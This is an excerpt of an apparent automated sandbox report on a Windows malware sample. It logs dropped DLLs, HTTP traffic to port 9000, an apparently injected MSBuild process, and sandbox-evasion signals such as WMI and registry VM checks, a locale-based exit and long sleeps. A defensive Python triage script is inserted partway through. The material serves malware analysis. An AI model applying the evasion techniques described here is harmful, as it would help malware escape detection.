Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\cmd.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\DVFFDL
Source: C:\Windows\SysWOW64\cmd.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JIPSOIOL
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49805
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00408761
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 identical entries)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (51 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX (83 identical entries)
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX (23 identical entries)

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (12 identical entries)
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Memory allocated: 21717A90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Memory allocated: 21731340000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 1000000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2B20000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2920000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 1870000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 31E0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 51E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Window / User API: threadDelayed 4312
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Window / User API: threadDelayed 5301
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 7677
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 1129
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\relay.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u2ts.2\relay.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u2ts.2\UIxMarketPlugin.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dvffdl
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jipsoiol
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe API coverage: 9.9 %
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe API coverage: 4.8 %
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe API coverage: 1.7 %
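The evasion entries in this section are raw signals an analyst has to read one by one: u2ts.3.exe enumerating HKLM\SYSTEM\ControlSet001\Enum\SCSI (disk friendly names reveal hypervisor vendors), u2ts.0.exe calling GetUserDefaultLangID and then ExitProcess (a locale geofence), MSBuild.exe and the SystemMechanic dropper querying Win32_DiskDrive / Win32_VideoController over WMI, and MSBuild.exe threads sleeping at or above the 30000 threshold the sandbox prints. The Python script below is an added example, not part of the Joe Sandbox report or of the sandbox: it parses lines in this report's `Source: <process> <event>` format and buckets them per process into evasion techniques. The sample lines are copied from the report; the technique labels, the `VM_WMI_CLASSES` and `VM_REG_KEY_MARKERS` sets (the `\Enum\IDE` marker is not in the report) and the assumption that process paths contain no spaces are this example's own.

```python
"""Per-process triage of 'Malware Analysis System Evasion' lines from a Joe
Sandbox report. Added example; not part of the report or of the sandbox."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed input: representative lines copied from the report. The trailing
# 'Jump to behavior' link text of the HTML page is kept on one line to show it
# is tolerated. Assumption: process paths contain no spaces.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6756 Thread sleep time: -60000s >= -30000s",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -35511s >= -30000s",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6756 Thread sleep time: -30000s >= -30000s",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX",
]

SOURCE_RE = re.compile(r"^Source:\s+(?P<proc>\S+)\s+(?P<event>.*?)(?:\s+Jump to behavior)?$")
SLEEP_RE = re.compile(r"TID: (?P<tid>\d+) Thread sleep time: -(?P<value>\d+)s >= -(?P<threshold>\d+)s")
WMI_RE = re.compile(r"WMI Queries: IWbemServices::ExecQuery - (?P<ns>\S+) : (?P<query>.+)$")
KEY_RE = re.compile(r"Key enumerated: (?P<key>\S+)")
CHAIN_RE = re.compile(r"Evasive API call chain: (?P<chain>.+)$")

# WMI classes whose results expose virtual hardware (disk model strings, disk
# sizes, GPU names). Classes taken from this report; treating them as a
# VM-fingerprint indicator is this example's assumption.
VM_WMI_CLASSES = {
    "win32_diskdrive", "win32_diskpartition", "win32_logicaldisk",
    "win32_diskdrivetodiskpartition", "win32_logicaldisktopartition",
    "win32_videocontroller",
}
# Device-enumeration keys whose friendly names carry hypervisor disk vendor
# strings. \Enum\SCSI is in the report; \Enum\IDE is added as the usual pair.
VM_REG_KEY_MARKERS = (r"\enum\scsi", r"\enum\ide")


@dataclass
class ProcessProfile:
    vm_wmi_classes: set = field(default_factory=set)
    vm_registry_keys: set = field(default_factory=set)
    locale_exit: bool = False
    sleeps: list = field(default_factory=list)   # (tid, value, threshold) as printed
    other: int = 0

    def long_sleeps(self):
        """Sleeps at or above the printed threshold (>= matches the report's own rule)."""
        return [s for s in self.sleeps if s[1] >= s[2]]

    def verdicts(self):
        v = []
        if self.vm_wmi_classes:
            v.append("vm-fingerprint-wmi")
        if self.vm_registry_keys:
            v.append("vm-fingerprint-registry")
        if self.locale_exit:
            v.append("locale-geofence")
        if self.long_sleeps():
            v.append("sandbox-timeout-stall")
        return v


def classify(line):
    """Return (process, kind, detail) for one report line, or None if it is not one."""
    m = SOURCE_RE.match(line.strip())
    if not m:
        return None
    proc, event = m["proc"], m["event"]
    if s := SLEEP_RE.search(event):
        return proc, "sleep", (int(s["tid"]), int(s["value"]), int(s["threshold"]))
    if w := WMI_RE.search(event):
        return proc, "wmi", {c.lower() for c in re.findall(r"Win32_\w+", w["query"], re.I)}
    if k := KEY_RE.search(event):
        return proc, "regkey", k["key"]
    if c := CHAIN_RE.search(event):
        return proc, "apichain", [api.strip() for api in c["chain"].split(",")]
    return proc, "other", event


def triage(lines):
    """Aggregate report lines into one ProcessProfile per source process."""
    profiles = defaultdict(ProcessProfile)
    for line in lines:
        parsed = classify(line)
        if parsed is None:
            continue
        proc, kind, detail = parsed
        p = profiles[proc]
        if kind == "sleep":
            p.sleeps.append(detail)
        elif kind == "wmi":
            p.vm_wmi_classes |= detail & VM_WMI_CLASSES
        elif kind == "regkey":
            if any(marker in detail.lower() for marker in VM_REG_KEY_MARKERS):
                p.vm_registry_keys.add(detail)
        elif kind == "apichain":
            # Locale lookup directly followed by exit: abort on an unwanted locale.
            if "GetUserDefaultLangID" in detail and "ExitProcess" in detail:
                p.locale_exit = True
        else:
            p.other += 1
    return dict(profiles)


if __name__ == "__main__":
    for proc, profile in triage(SAMPLE_LINES).items():
        print(f"{proc}\n  verdicts: {profile.verdicts() or ['none']}"
              f"\n  long sleeps: {len(profile.long_sleeps())}, wmi: {sorted(profile.vm_wmi_classes)}")
```

Run against the full report text, the script separates the processes that only set NOOPENFILEERRORBOX (noise, counted under `other`) from the three that carry evasion verdicts. The `>=` in `long_sleeps` is deliberate: the report itself flags `-30000s >= -30000s`, so a sleep exactly at the threshold counts.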
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 7540 Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 7544 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6756 Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6756 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -35511s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6756 Thread sleep time: -59836s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -40234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6756 Thread sleep time: -59718s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -48864s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6756 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -32845s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -51147s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -56452s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -30442s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -53347s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -49843s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -36423s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -40238s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -47963s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -30339s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -36388s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -34666s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -53467s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -38120s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -35343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -54129s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -35309s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -34492s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -44719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -49642s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -35996s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -50222s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -52005s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -36184s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -50385s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -42138s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -40532s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -32671s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -52225s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -53819s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -41500s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -51726s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -34731s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -48714s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -50658s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -49494s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -32649s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -44342s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -45027s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -30663s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -59755s >= -30000s
